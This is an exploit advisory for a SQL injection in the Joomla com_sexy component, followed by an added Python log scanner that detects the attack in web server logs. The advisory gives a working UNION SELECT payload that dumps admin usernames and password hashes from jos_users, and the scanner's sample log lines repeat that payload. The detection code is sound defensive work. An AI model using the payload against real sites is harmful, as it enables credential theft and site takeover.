The Joomla Sexy component suffers from a remote SQL injection vulnerability.
########################################################################
# Joomla Component com_sexy SQL Injection Vulnerability
########################################################################
#
# Author    : FL0RiX
# Greetz    : All Tahkikat-ul Ahlak Family
# Name      : com_sexy
# Bug Type  : SQL Injection
# Infection : Admin login credentials can be obtained.
#
# Demo Vuln :
# site.com/index.php?option=com_sexy&view=girl&id=[EXPLOIT]
#
# EXPLOIT :
null/**/union/**/select/**/1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47/**/from/**/jos_users--
#############################################################################
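
A defender's check for this request pattern, as an added example that is not part of the original advisory: it scans web access logs for com_sexy requests whose id parameter is not a plain integer and reports any SQL keywords found once /**/ comments are collapsed. The common/combined log format, the function names, and the rule that a legitimate id is purely numeric are assumptions; the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in common log format (not from a real server).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2010:13:55:36 +0000] "GET /index.php?option=com_sexy&view=girl&id=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [10/Oct/2010:13:56:01 +0000] "GET /index.php?option=com_sexy&view=girl&id=null/**/union/**/select/**/1,2,3/**/from/**/jos_users-- HTTP/1.1" 200 7301',
    '203.0.113.9 - - [10/Oct/2010:13:56:09 +0000] "GET /index.php?option=com_sexy&view=girl&id=null%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F1 HTTP/1.1" 200 7301',
    '198.51.100.7 - - [10/Oct/2010:13:57:12 +0000] "GET /index.php?option=com_content&view=article&id=3 HTTP/1.1" 200 4000',
]

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
INLINE_COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)
SQL_KEYWORD_RE = re.compile(r"\b(union|select|from|concat)\b", re.I)


def inspect(line):
    """Return a finding dict for a suspicious com_sexy request, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    client, target = m.groups()
    # parse_qs percent-decodes, so encoded and plain payloads look the same.
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if params.get("option", [""])[0].lower() != "com_sexy":
        return None
    for value in params.get("id", []):
        if re.fullmatch(r"[0-9]+", value):
            continue  # assumption: a legitimate record id is a plain integer
        # Inline comments stand in for spaces in the advisory's payload.
        flat = INLINE_COMMENT_RE.sub(" ", value)
        keywords = sorted({k.lower() for k in SQL_KEYWORD_RE.findall(flat)})
        return {"client": client, "id": value, "sql_keywords": keywords}
    return None


def scan(lines):
    """Inspect every log line and keep only the findings."""
    return [f for f in map(inspect, lines) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A non-numeric id with an empty keyword list is still worth reviewing, since the numeric check is the primary signal and the keyword list is only context for triage.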